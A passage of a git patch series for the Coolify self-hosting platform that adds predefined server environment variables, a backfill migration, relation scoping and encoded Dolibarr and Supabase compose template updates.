-        $this->variables = $this->formatEnvironmentVariables($this->server->environment_variables->sortBy('key'));
+        $this->variables = $this->formatEnvironmentVariables($this->server->environment_variables->whereNotIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])->sortBy('key'));
     }
 
     private function formatEnvironmentVariables($variables)
@@ -115,13 +119,19 @@ private function handleBulkSubmit()
 
     private function deleteRemovedVariables($variables)
     {
-        $variablesToDelete = $this->server->environment_variables()->whereNotIn('key', array_keys($variables))->get();
+        $variablesToDelete = $this->server->environment_variables()
+            ->whereNotIn('key', array_keys($variables))
+            ->whereNotIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])
+            ->get();
 
         if ($variablesToDelete->isEmpty()) {
             return 0;
         }
 
-        $this->server->environment_variables()->whereNotIn('key', array_keys($variables))->delete();
+        $this->server->environment_variables()
+            ->whereNotIn('key', array_keys($variables))
+            ->whereNotIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])
+            ->delete();
 
         return $variablesToDelete->count();
     }
@@ -130,6 +140,10 @@ private function updateOrCreateVariables($variables)
     {
         $count = 0;
         foreach ($variables as $key => $value) {
+            // Skip predefined variables
+            if (in_array($key, ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])) {
+                continue;
+            }
             $found = $this->server->environment_variables()->where('key', $key)->first();
 
             if ($found) {
diff --git a/app/Models/Environment.php b/app/Models/Environment.php
index c2ad9d2cb..38138da1e 100644
--- a/app/Models/Environment.php
+++ b/app/Models/Environment.php
@@ -56,7 +56,7 @@ public function isEmpty()
 
     public function environment_variables()
     {
-        return $this->hasMany(SharedEnvironmentVariable::class);
+        return $this->hasMany(SharedEnvironmentVariable::class)->where('type', 'environment');
     }
 
     public function applications()
diff --git a/app/Models/Project.php b/app/Models/Project.php
index 8b26672f0..c1d7dc82a 100644
--- a/app/Models/Project.php
+++ b/app/Models/Project.php
@@ -73,7 +73,7 @@ protected static function booted()
 
     public function environment_variables()
     {
-        return $this->hasMany(SharedEnvironmentVariable::class);
+        return $this->hasMany(SharedEnvironmentVariable::class)->where('type', 'project');
     }
 
     public function environments()
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 31d4f6440..46587e7bc 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -19,6 +19,7 @@
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Builder;
 use Illuminate\Database\Eloquent\Casts\Attribute;
+use Illuminate\Database\Eloquent\Relations\HasMany;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
 use Illuminate\Database\Eloquent\SoftDeletes;
 use Illuminate\Support\Carbon;
@@ -168,9 +169,25 @@ protected static function booted()
                     $standaloneDocker->saveQuietly();
                 }
             }
-            if (! isset($server->proxy->redirect_enabled)) {
+             if (! isset($server->proxy->redirect_enabled)) {
                 $server->proxy->redirect_enabled = true;
             }
+
+            // Create predefined server shared variables
+            SharedEnvironmentVariable::create([
+                'key' => 'COOLIFY_SERVER_UUID',
+                'value' => $server->uuid,
+                'type' => 'server',
+                'server_id' => $server->id,
+                'team_id' => $server->team_id,
+            ]);
+            SharedEnvironmentVariable::create([
+                'key' => 'COOLIFY_SERVER_NAME',
+                'value' => $server->name,
+                'type' => 'server',
+                'server_id' => $server->id,
+                'team_id' => $server->team_id,
+            ]);
         });
         static::retrieved(function ($server) {
             if (! isset($server->proxy->redirect_enabled)) {
diff --git a/app/Models/Team.php b/app/Models/Team.php
index 5cb186942..b98ae08ff 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -214,7 +214,7 @@ public function subscriptionEnded()
 
     public function environment_variables()
     {
-        return $this->hasMany(SharedEnvironmentVariable::class)->whereNull('project_id')->whereNull('environment_id');
+        return $this->hasMany(SharedEnvironmentVariable::class)->where('type', 'team');
     }
 
     public function members()
diff --git a/database/seeders/SharedEnvironmentVariableSeeder.php b/database/seeders/SharedEnvironmentVariableSeeder.php
index 54643fe3b..b55d13a17 100644
--- a/database/seeders/SharedEnvironmentVariableSeeder.php
+++ b/database/seeders/SharedEnvironmentVariableSeeder.php
@@ -2,6 +2,7 @@
 
 namespace Database\Seeders;
 
+use App\Models\Server;
 use App\Models\SharedEnvironmentVariable;
 use Illuminate\Database\Seeder;
 
@@ -32,5 +33,27 @@ public function run(): void
             'project_id' => 1,
             'team_id' => 0,
         ]);
+
+        // Add predefined server variables to all existing servers
+        $servers = \App\Models\Server::all();
+        foreach ($servers as $server) {
+            SharedEnvironmentVariable::firstOrCreate([
+                'key' => 'COOLIFY_SERVER_UUID',
+                'type' => 'server',
+                'server_id' => $server->id,
+                'team_id' => $server->team_id,
+            ], [
+                'value' => $server->uuid,
+            ]);
+
+            SharedEnvironmentVariable::firstOrCreate([
+                'key' => 'COOLIFY_SERVER_NAME',
+                'type' => 'server',
+                'server_id' => $server->id,
+                'team_id' => $server->team_id,
+            ], [
+                'value' => $server->name,
+            ]);
+        }
     }
 }
diff --git a/resources/views/livewire/shared-variables/server/show.blade.php b/resources/views/livewire/shared-variables/server/show.blade.php
index 44ceeae7f..cddde9c76 100644
--- a/resources/views/livewire/shared-variables/server/show.blade.php
+++ b/resources/views/livewire/shared-variables/server/show.blade.php
@@ -19,7 +19,7 @@
     </div>
     @if ($view === 'normal')
         <div class="flex flex-col gap-2">
-            @forelse ($server->environment_variables->sort()->sortBy('key') as $env)
+            @forelse ($server->environment_variables->whereNotIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])->sort()->sortBy('key') as $env)
                 <livewire:project.shared.environment-variable.show wire:key="environment-{{ $env->id }}"
                     :env="$env" type="server" />
             @empty

From 09e14d2f516a426822b5c441ceda12bafba475cf Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Wed, 24 Dec 2025 14:40:00 +0100
Subject: [PATCH 004/213] fix: server env not showing for services

---
 .../Shared/EnvironmentVariable/Add.php        | 20 +++++++++++++++++++
 .../Shared/EnvironmentVariable/Show.php       | 20 +++++++++++++++++++
 2 files changed, 40 insertions(+)

diff --git a/app/Livewire/Project/Shared/EnvironmentVariable/Add.php b/app/Livewire/Project/Shared/EnvironmentVariable/Add.php
index f1b92c5db..fdcb39270 100644
--- a/app/Livewire/Project/Shared/EnvironmentVariable/Add.php
+++ b/app/Livewire/Project/Shared/EnvironmentVariable/Add.php
@@ -160,6 +160,26 @@ public function availableSharedVariables(): array
                         // User not authorized to view server variables
                     }
                 }
+            } else {
+                // For service environment variables, try to use the service's server
+                $serviceUuid = data_get($this->parameters, 'service_uuid');
+                if ($serviceUuid) {
+                    $service = \App\Models\Service::whereRelation('environment.project.team', 'id', $team->id)
+                        ->where('uuid', $serviceUuid)
+                        ->with('server')
+                        ->first();
+
+                    if ($service && $service->server) {
+                        try {
+                            $this->authorize('view', $service->server);
+                            $result['server'] = $service->server->environment_variables()
+                                ->pluck('key')
+                                ->toArray();
+                        } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                            // User not authorized to view server variables
+                        }
+                    }
+                }
             }
         }
 
diff --git a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
index a14adb83f..ac7549f18 100644
--- a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
+++ b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
@@ -297,6 +297,26 @@ public function availableSharedVariables(): array
                         // User not authorized to view server variables
                     }
                 }
+            } else {
+                // For service environment variables, try to use the service's server
+                $serviceUuid = data_get($this->parameters, 'service_uuid');
+                if ($serviceUuid) {
+                    $service = \App\Models\Service::whereRelation('environment.project.team', 'id', $team->id)
+                        ->where('uuid', $serviceUuid)
+                        ->with('server')
+                        ->first();
+
+                    if ($service && $service->server) {
+                        try {
+                            $this->authorize('view', $service->server);
+                            $result['server'] = $service->server->environment_variables()
+                                ->pluck('key')
+                                ->toArray();
+                        } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                            // User not authorized to view server variables
+                        }
+                    }
+                }
             }
         }
 

From 82b19e59214826f557f294352bc66fa9a0525246 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Wed, 24 Dec 2025 14:41:08 +0100
Subject: [PATCH 005/213] fix: predefined server env were not generated for
 existing servers

---
 app/Models/SharedEnvironmentVariable.php      |  2 +-
 ...d_server_variables_to_existing_servers.php | 68 +++++++++++++++++++
 2 files changed, 69 insertions(+), 1 deletion(-)
 create mode 100644 database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php

diff --git a/app/Models/SharedEnvironmentVariable.php b/app/Models/SharedEnvironmentVariable.php
index 7b68bbac9..de6b23425 100644
--- a/app/Models/SharedEnvironmentVariable.php
+++ b/app/Models/SharedEnvironmentVariable.php
@@ -10,7 +10,7 @@ class SharedEnvironmentVariable extends Model
 
     protected $casts = [
         'key' => 'string',
-        'value' => 'encrypted',
+        'value' => 'string',
     ];
 
     public function team()
diff --git a/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php b/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
new file mode 100644
index 000000000..d31b57ca7
--- /dev/null
+++ b/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
@@ -0,0 +1,68 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Support\Facades\DB;
+
+return new class extends Migration
+{
+    /**
+     * Run the migrations.
+     */
+    public function up(): void
+    {
+        // Add predefined server variables to all existing servers
+        $servers = DB::table('servers')->get();
+
+        foreach ($servers as $server) {
+            // Check if COOLIFY_SERVER_UUID already exists
+            $uuidExists = DB::table('shared_environment_variables')
+                ->where('type', 'server')
+                ->where('server_id', $server->id)
+                ->where('key', 'COOLIFY_SERVER_UUID')
+                ->exists();
+
+            if (!$uuidExists) {
+                DB::table('shared_environment_variables')->insert([
+                    'key' => 'COOLIFY_SERVER_UUID',
+                    'value' => $server->uuid,
+                    'type' => 'server',
+                    'server_id' => $server->id,
+                    'team_id' => $server->team_id,
+                    'created_at' => now(),
+                    'updated_at' => now(),
+                ]);
+            }
+
+            // Check if COOLIFY_SERVER_NAME already exists
+            $nameExists = DB::table('shared_environment_variables')
+                ->where('type', 'server')
+                ->where('server_id', $server->id)
+                ->where('key', 'COOLIFY_SERVER_NAME')
+                ->exists();
+
+            if (!$nameExists) {
+                DB::table('shared_environment_variables')->insert([
+                    'key' => 'COOLIFY_SERVER_NAME',
+                    'value' => $server->name,
+                    'type' => 'server',
+                    'server_id' => $server->id,
+                    'team_id' => $server->team_id,
+                    'created_at' => now(),
+                    'updated_at' => now(),
+                ]);
+            }
+        }
+    }
+
+    /**
+     * Reverse the migrations.
+     */
+    public function down(): void
+    {
+        // Remove predefined server variables
+        DB::table('shared_environment_variables')
+            ->where('type', 'server')
+            ->whereIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])
+            ->delete();
+    }
+};

From e3df380a04b4cb16fd01b0c05d084509ab668f8f Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 2 Jan 2026 17:30:53 +0100
Subject: [PATCH 006/213] fix: change value cast to encrypted for shared
 environment variables

---
 app/Models/SharedEnvironmentVariable.php | 2 +-
 templates/service-templates-latest.json  | 6 +++---
 templates/service-templates.json         | 6 +++---
 3 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/app/Models/SharedEnvironmentVariable.php b/app/Models/SharedEnvironmentVariable.php
index de6b23425..7b68bbac9 100644
--- a/app/Models/SharedEnvironmentVariable.php
+++ b/app/Models/SharedEnvironmentVariable.php
@@ -10,7 +10,7 @@ class SharedEnvironmentVariable extends Model
 
     protected $casts = [
         'key' => 'string',
-        'value' => 'string',
+        'value' => 'encrypted',
     ];
 
     public function team()
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index c3e33b582..1986e17d3 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -851,7 +851,7 @@
     "dolibarr": {
         "documentation": "https://www.dolibarr.org/documentation-home.php?utm_source=coolify.io",
         "slogan": "Dolibarr is a modern software package to manage your organization's activity (contacts, quotes, invoices, orders, stocks, agenda, hr, expense reports, accountancy, ecm, manufacturing, ...).",
-        "compose": "c2VydmljZXM6CiAgZG9saWJhcnI6CiAgICBpbWFnZTogJ2RvbGliYXJyL2RvbGliYXJyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0RPTElCQVJSXzgwCiAgICAgIC0gJ1dXV19VU0VSX0lEPSR7V1dXX1VTRVJfSUQ6LTEwMDB9JwogICAgICAtICdXV1dfR1JPVVBfSUQ9JHtXV1dfR1JPVVBfSUQ6LTEwMDB9JwogICAgICAtIERPTElfREJfSE9TVD1tYXJpYWRiCiAgICAgIC0gJ0RPTElfREJfTkFNRT0ke01ZU1FMX0RBVEFCQVNFOi1kb2xpYmFyci1kYn0nCiAgICAgIC0gJ0RPTElfREJfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NWVNRTH0nCiAgICAgIC0gJ0RPTElfREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMfScKICAgICAgLSAnRE9MSV9VUkxfUk9PVD0ke1NFUlZJQ0VfVVJMX0RPTElCQVJSfScKICAgICAgLSAnRE9MSV9BRE1JTl9MT0dJTj0ke1NFUlZJQ0VfVVNFUl9ET0xJQkFSUn0nCiAgICAgIC0gJ0RPTElfQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0RPTElCQVJSfScKICAgICAgLSAnRE9MSV9DUk9OPSR7RE9MSV9DUk9OOi0wfScKICAgICAgLSAnRE9MSV9JTklUX0RFTU89JHtET0xJX0lOSVRfREVNTzotMH0nCiAgICAgIC0gJ0RPTElfQ09NUEFOWV9OQU1FPSR7RE9MSV9DT01QQU5ZX05BTUU6LU15QmlnQ29tcGFueX0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6ODAnCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUKICBtYXJpYWRiOgogICAgaW1hZ2U6ICdtYXJpYWRiOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdNWVNRTF9EQVRBQkFTRT0ke01ZU1FMX0RBVEFCQVNFOi1kb2xpYmFyci1kYn0nCiAgICAgIC0gJ01ZU1FMX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdNWVNRTF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgICAtICdNWVNRTF9ST09UX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9ST09UfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RvbGliYXJyX21hcmlhZGJfZGF0YTovdmFyL2xpYi9teXNxbCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBoZWFsdGhjaGVjay5zaAogICAgICAgIC0gJy0tY29ubmVjdCcKICAgICAgICAtICctLWlubm9kYl9pbml0aWFsaXplZCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
+        "compose": "c2VydmljZXM6CiAgZG9saWJhcnI6CiAgICBpbWFnZTogJ2RvbGliYXJyL2RvbGliYXJyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0RPTElCQVJSXzgwCiAgICAgIC0gJ1dXV19VU0VSX0lEPSR7V1dXX1VTRVJfSUQ6LTEwMDB9JwogICAgICAtICdXV1dfR1JPVVBfSUQ9JHtXV1dfR1JPVVBfSUQ6LTEwMDB9JwogICAgICAtIERPTElfREJfSE9TVD1tYXJpYWRiCiAgICAgIC0gJ0RPTElfREJfTkFNRT0ke01ZU1FMX0RBVEFCQVNFOi1kb2xpYmFyci1kYn0nCiAgICAgIC0gJ0RPTElfREJfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NWVNRTH0nCiAgICAgIC0gJ0RPTElfREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMfScKICAgICAgLSAnRE9MSV9VUkxfUk9PVD0ke1NFUlZJQ0VfVVJMX0RPTElCQVJSfScKICAgICAgLSAnRE9MSV9BRE1JTl9MT0dJTj0ke1NFUlZJQ0VfVVNFUl9ET0xJQkFSUn0nCiAgICAgIC0gJ0RPTElfQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0RPTElCQVJSfScKICAgICAgLSAnRE9MSV9DUk9OPSR7RE9MSV9DUk9OOi0wfScKICAgICAgLSAnRE9MSV9JTklUX0RFTU89JHtET0xJX0lOSVRfREVNTzotMH0nCiAgICAgIC0gJ0RPTElfQ09NUEFOWV9OQU1FPSR7RE9MSV9DT01QQU5ZX05BTUU6LU15QmlnQ29tcGFueX0nCiAgICB2b2x1bWVzOgogICAgICAtICdkb2xpYmFycl9kb2NzOi92YXIvd3d3L2RvY3VtZW50cycKICAgICAgLSAnZG9saWJhcnJfY3VzdG9tOi92YXIvd3d3L2h0bWwvY3VzdG9tJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjgwJwogICAgICBpbnRlcnZhbDogMnMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjpsYXRlc3QnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTVlTUUxfREFUQUJBU0U9JHtNWVNRTF9EQVRBQkFTRTotZG9saWJhcnItZGJ9JwogICAgICAtICdNWVNRTF9VU0VSPSR7U0VSVklDRV9VU0VSX01ZU1FMfScKICAgICAgLSAnTVlTUUxfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMfScKICAgICAgLSAnTVlTUUxfUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUk9PVH0nCiAgICB2b2x1bWVzOgogICAgICAtICdkb2xpYmFycl9tYXJpYWRiX2RhdGE6L3Zhci9saWIvbXlzcWwnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gaGVhbHRoY2hlY2suc2gKICAgICAgICAtICctLWNvbm5lY3QnCiAgICAgICAgLSAnLS1pbm5vZGJfaW5pdGlhbGl6ZWQnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
         "tags": [
             "crm",
             "erp"
@@ -4088,7 +4088,7 @@
     "supabase": {
         "documentation": "https://supabase.io?utm_source=coolify.io",
         "slogan": "The open source Firebase alternative.",
-        "compose": "c2VydmljZXM6CiAgc3VwYWJhc2Uta29uZzoKICAgIGltYWdlOiAna29uZzoyLjguMScKICAgIGVudHJ5cG9pbnQ6ICdiYXNoIC1jICcnZXZhbCAiZWNobyBcIiQkKGNhdCB+L3RlbXAueW1sKVwiIiA+IH4va29uZy55bWwgJiYgL2RvY2tlci1lbnRyeXBvaW50LnNoIGtvbmcgZG9ja2VyLXN0YXJ0JycnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX1NVUEFCQVNFS09OR184MDAwCiAgICAgIC0gJ0tPTkdfUE9SVF9NQVBTPTQ0Mzo4MDAwJwogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIEtPTkdfREFUQUJBU0U9b2ZmCiAgICAgIC0gS09OR19ERUNMQVJBVElWRV9DT05GSUc9L2hvbWUva29uZy9rb25nLnltbAogICAgICAtICdLT05HX0ROU19PUkRFUj1MQVNULEEsQ05BTUUnCiAgICAgIC0gJ0tPTkdfUExVR0lOUz1yZXF1ZXN0LXRyYW5zZm9ybWVyLGNvcnMsa2V5LWF1dGgsYWNsLGJhc2ljLWF1dGgnCiAgICAgIC0gS09OR19OR0lOWF9QUk9YWV9QUk9YWV9CVUZGRVJfU0laRT0xNjBrCiAgICAgIC0gJ0tPTkdfTkdJTlhfUFJPWFlfUFJPWFlfQlVGRkVSUz02NCAxNjBrJwogICAgICAtICdTVVBBQkFTRV9BTk9OX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VBTk9OX0tFWX0nCiAgICAgIC0gJ1NVUEFCQVNFX1NFUlZJQ0VfS0VZPSR7U0VSVklDRV9TVVBBQkFTRVNFUlZJQ0VfS0VZfScKICAgICAgLSAnREFTSEJPQVJEX1VTRVJOQU1FPSR7U0VSVklDRV9VU0VSX0FETUlOfScKICAgICAgLSAnREFTSEJPQVJEX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2FwaS9rb25nLnltbAogICAgICAgIHRhcmdldDogL2hvbWUva29uZy90ZW1wLnltbAogICAgICAgIGNvbnRlbnQ6ICJfZm9ybWF0X3ZlcnNpb246ICcyLjEnXG5fdHJhbnNmb3JtOiB0cnVlXG5cbiMjI1xuIyMjIENvbnN1bWVycyAvIFVzZXJzXG4jIyNcbmNvbnN1bWVyczpcbiAgLSB1c2VybmFtZTogREFTSEJPQVJEXG4gIC0gdXNlcm5hbWU6IGFub25cbiAgICBrZXlhdXRoX2NyZWRlbnRpYWxzOlxuICAgICAgLSBrZXk6ICRTVVBBQkFTRV9BTk9OX0tFWVxuICAtIHVzZXJuYW1lOiBzZXJ2aWNlX3JvbGVcbiAgICBrZXlhdXRoX2NyZWRlbnRpYWxzOlxuICAgICAgLSBrZXk6ICRTVVBBQkFTRV9TRVJWSUNFX0tFWVxuXG4jIyNcbiMjIyBBY2Nlc3MgQ29udHJvbCBMaXN0XG4jIyNcbmFjbHM6XG4gIC0gY29uc3VtZXI6IGFub25cbiAgICBncm91cDogYW5vblxuICAtIGNvbnN1bWVyOiBzZXJ2aWNlX3JvbGVcbiAgICBncm91cDogYWRtaW5cblxuIyMjXG4jIyMgRGFzaGJvYXJkIGNyZWRlbnRpYWxzXG4jIyNcbmJhc2ljYXV0aF9jcmVkZW50aWFsczpcbi0gY29uc3VtZXI6IERBU0hCT0FSRFxuICB1c2VybmFtZTogJERBU0hCT0FSRF9VU0VSTkFNRVxuICBwYXNzd29yZDogJERBU0hCT0FSRF9QQVNTV09SRFxuXG5cbiMjI1xuIyMjIEFQSSBSb3V0ZXNcbiMjI1xuc2VydmljZXM6XG5cbiAgIyMgT3BlbiBBdXRoIHJvdXRlc1xuICAtIG5hbWU6IGF1dGgtdjEtb3BlblxuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS92ZXJpZnlcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtb3BlblxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2F1dGgvdjEvdmVyaWZ5XG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAtIG5hbWU6IGF1dGgtdjEtb3Blbi1jYWxsYmFja1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS9jYWxsYmFja1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYXV0aC12MS1vcGVuLWNhbGxiYWNrXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvYXV0aC92MS9jYWxsYmFja1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgLSBuYW1lOiBhdXRoLXYxLW9wZW4tYXV0aG9yaXplXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtYXV0aDo5OTk5L2F1dGhvcml6ZVxuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYXV0aC12MS1vcGVuLWF1dGhvcml6ZVxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2F1dGgvdjEvYXV0aG9yaXplXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuXG4gICMjIFNlY3VyZSBBdXRoIHJvdXRlc1xuICAtIG5hbWU6IGF1dGgtdjFcbiAgICBfY29tbWVudDogJ0dvVHJ1ZTogL2F1dGgvdjEvKiAtPiBodHRwOi8vc3VwYWJhc2UtYXV0aDo5OTk5LyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtYXV0aDo5OTk5L1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYXV0aC12MS1hbGxcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9hdXRoL3YxL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IGZhbHNlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cblxuICAjIyBTZWN1cmUgUkVTVCByb3V0ZXNcbiAgLSBuYW1lOiByZXN0LXYxXG4gICAgX2NvbW1lbnQ6ICdQb3N0Z1JFU1Q6IC9yZXN0L3YxLyogLT4gaHR0cDovL3N1cGFiYXNlLXJlc3Q6MzAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLXJlc3Q6MzAwMC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHJlc3QtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcmVzdC92MS9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiB0cnVlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cblxuICAjIyBTZWN1cmUgR3JhcGhRTCByb3V0ZXNcbiAgLSBuYW1lOiBncmFwaHFsLXYxXG4gICAgX2NvbW1lbnQ6ICdQb3N0Z1JFU1Q6IC9ncmFwaHFsL3YxLyogLT4gaHR0cDovL3N1cGFiYXNlLXJlc3Q6MzAwMC9ycGMvZ3JhcGhxbCdcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvcnBjL2dyYXBocWxcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGdyYXBocWwtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvZ3JhcGhxbC92MVxuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IHRydWVcbiAgICAgIC0gbmFtZTogcmVxdWVzdC10cmFuc2Zvcm1lclxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgYWRkOlxuICAgICAgICAgICAgaGVhZGVyczpcbiAgICAgICAgICAgICAgLSBDb250ZW50LVByb2ZpbGU6Z3JhcGhxbF9wdWJsaWNcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cbiAgICAgICAgICAgIC0gYW5vblxuXG4gICMjIFNlY3VyZSBSZWFsdGltZSByb3V0ZXNcbiAgLSBuYW1lOiByZWFsdGltZS12MS13c1xuICAgIF9jb21tZW50OiAnUmVhbHRpbWU6IC9yZWFsdGltZS92MS8qIC0+IHdzOi8vcmVhbHRpbWU6NDAwMC9zb2NrZXQvKidcbiAgICB1cmw6IGh0dHA6Ly9yZWFsdGltZS1kZXY6NDAwMC9zb2NrZXRcbiAgICBwcm90b2N